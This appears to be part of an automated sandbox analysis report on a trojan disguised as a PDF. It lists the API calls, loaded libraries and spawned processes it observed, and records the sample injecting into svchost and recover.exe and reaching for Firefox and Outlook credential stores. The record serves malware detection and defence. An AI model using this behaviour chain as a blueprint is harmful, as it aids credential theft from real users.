                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03944650 NtSuspendThread,LdrInitializeThunk,3_2_03944650
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03942BA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03942BF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03942BE0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942B60 NtClose,LdrInitializeThunk,3_2_03942B60
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942AD0 NtReadFile,LdrInitializeThunk,3_2_03942AD0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942AF0 NtWriteFile,LdrInitializeThunk,3_2_03942AF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942FB0 NtResumeThread,LdrInitializeThunk,3_2_03942FB0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942FE0 NtCreateFile,LdrInitializeThunk,3_2_03942FE0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942F30 NtCreateSection,LdrInitializeThunk,3_2_03942F30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03942E80
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03942EE0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942DD0 NtDelayExecution,LdrInitializeThunk,3_2_03942DD0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03942DF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03942D10
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03942D30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03942CA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03942C70
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942C60 NtCreateKey,LdrInitializeThunk,3_2_03942C60
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039435C0 NtCreateMutant,LdrInitializeThunk,3_2_039435C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039439B0 NtGetContextThread,LdrInitializeThunk,3_2_039439B0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942B80 NtQueryInformationFile,3_2_03942B80
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942AB0 NtWaitForSingleObject,3_2_03942AB0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942F90 NtProtectVirtualMemory,3_2_03942F90
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942FA0 NtQuerySection,3_2_03942FA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942F60 NtCreateProcessEx,3_2_03942F60
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942EA0 NtAdjustPrivilegesToken,3_2_03942EA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942E30 NtWriteVirtualMemory,3_2_03942E30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942DB0 NtEnumerateKey,3_2_03942DB0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942D00 NtSetInformationFile,3_2_03942D00
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942CC0 NtQueryVirtualMemory,3_2_03942CC0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942CF0 NtOpenProcess,3_2_03942CF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942C00 NtQueryInformationProcess,3_2_03942C00
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943090 NtSetValueKey,3_2_03943090
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943010 NtOpenDirectoryObject,3_2_03943010
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943D10 NtOpenProcessToken,3_2_03943D10
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943D70 NtOpenThread,3_2_03943D70
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F99240 NtReadFile,3_2_02F99240
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F993D0 NtClose,3_2_02F993D0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F99330 NtDeleteFile,3_2_02F99330
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F990D0 NtCreateFile,3_2_02F990D0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F99540 NtAllocateVirtualMemory,3_2_02F99540
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_037DF975 NtClose,3_2_037DF975
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B440B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00B440B1
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B38858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B38858
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B4545F
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AEE8000_2_00AEE800
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0DBB50_2_00B0DBB5
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AEE0600_2_00AEE060
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B6804A0_2_00B6804A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF41400_2_00AF4140
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B024050_2_00B02405
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B165220_2_00B16522
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B1267E0_2_00B1267E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B606650_2_00B60665
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0283A0_2_00B0283A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF68430_2_00AF6843
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B189DF0_2_00B189DF
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B16A940_2_00B16A94
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B60AE20_2_00B60AE2
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF8A0E0_2_00AF8A0E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B48B130_2_00B48B13
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B3EB070_2_00B3EB07
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0CD610_2_00B0CD61
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B170060_2_00B17006
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF31900_2_00AF3190
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF710E0_2_00AF710E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE12870_2_00AE1287
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B033C70_2_00B033C7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0F4190_2_00B0F419
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF56800_2_00AF5680
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B016C40_2_00B016C4
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B078D30_2_00B078D3
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF58C00_2_00AF58C0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B01BB80_2_00B01BB8
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B19D050_2_00B19D05
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AEFE400_2_00AEFE40
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0BFE60_2_00B0BFE6
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B01FD00_2_00B01FD0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_01C535D00_2_01C535D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004188A31_2_004188A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028401_2_00402840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030591_2_00403059
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028311_2_00402831
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028381_2_00402838
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041016A1_2_0041016A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416ADE1_2_00416ADE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AE31_2_00416AE3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 107 times
                Source: C:\Windows\SysWOW64\recover.exe | Code function: String function: 03945130 appears 58 times
                Source: C:\Windows\SysWOW64\recover.exe | Code function: String function: 0397EA12 appears 86 times
                Source: C:\Windows\SysWOW64\recover.exe | Code function: String function: 03957E54 appears 107 times
                Source: C:\Windows\SysWOW64\recover.exe | Code function: String function: 0398F290 appears 103 times
                Source: C:\Windows\SysWOW64\recover.exe | Code function: String function: 038FB970 appears 262 times
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: String function: 00B00D27 appears 70 times
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: String function: 00AE7F41 appears 35 times
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: String function: 00B08B40 appears 42 times
                Source: SC_TR11670000_pdf.exe, 00000000.00000003.1749917266.0000000003AC3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SC_TR11670000_pdf.exe
                Source: SC_TR11670000_pdf.exe, 00000000.00000003.1749593747.0000000003C6D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SC_TR11670000_pdf.exe
                Source: SC_TR11670000_pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/11
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4A2D5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B38713 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B38CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B5F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B586D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00AE4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | File created: C:\Users\user\AppData\Local\Temp\aut4B44.tmp
                Source: SC_TR11670000_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: recover.exe, 00000003.00000003.3092659925.0000000003343000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003343000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000003.2108774399.0000000003343000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SC_TR11670000_pdf.exe | ReversingLabs: Detection: 76%
                Source: unknown | Process created: C:\Users\user\Desktop\SC_TR11670000_pdf.exe "C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Process created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"
                Source: C:\Windows\SysWOW64\recover.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: ifsutil.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: devobj.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: winnsi.dll
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\recover.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\recover.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: SC_TR11670000_pdf.exe | Static file information: File size 1179136 > 1048576
                Source: SC_TR11670000_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SC_TR11670000_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SC_TR11670000_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SC_TR11670000_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SC_TR11670000_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SC_TR11670000_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SC_TR11670000_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: recover.pdb | source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: oCCZhsVsNwIIN.exe, 00000002.00000000.1840086036.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4204891761.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP | source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb | source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: recover.pdbGCTL source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
                Source: SC_TR11670000_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SC_TR11670000_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SC_TR11670000_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SC_TR11670000_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SC_TR11670000_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B5C304 LoadLibraryA,GetProcAddress, 0_2_00B5C304
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B48719 push FFFFFF8Bh; iretd 0_2_00B4871B
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B0E94F push edi; ret 0_2_00B0E951
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B0EA68 push esi; ret 0_2_00B0EA6A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B08B85 push ecx; ret 0_2_00B08B98
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B0EC43 push esi; ret 0_2_00B0EC45
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B0ED2C push edi; ret 0_2_00B0ED2E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004180D3 pushfd ; ret 1_2_004180F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040B0BC push ds; retf 1_2_0040B0BE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402146 push 00000048h; retf 1_2_0040212C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402155 push 00000048h; retf 1_2_0040212C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040210D push 00000048h; retf 1_2_0040212C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00419364 push ebp; iretd 1_2_00419366
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041454E push cs; retf 1_2_0041454F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040AD0C push edx; iretd 1_2_0040AD0D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403520 push eax; ret 1_2_00403522
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00411DBB push ss; retf 1_2_00411EBC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00411EAE push ss; retf 1_2_00411EBC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036027FA pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx 1_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0360283D push eax; iretd 1_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0360135F push eax; iretd 1_2_03601369
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_038D225F pushad ; ret 3_2_038D27F9
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_038D27FA pushad ; ret 3_2_038D27F9
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_039009AD push ecx; mov dword ptr [esp], ecx 3_2_039009B6
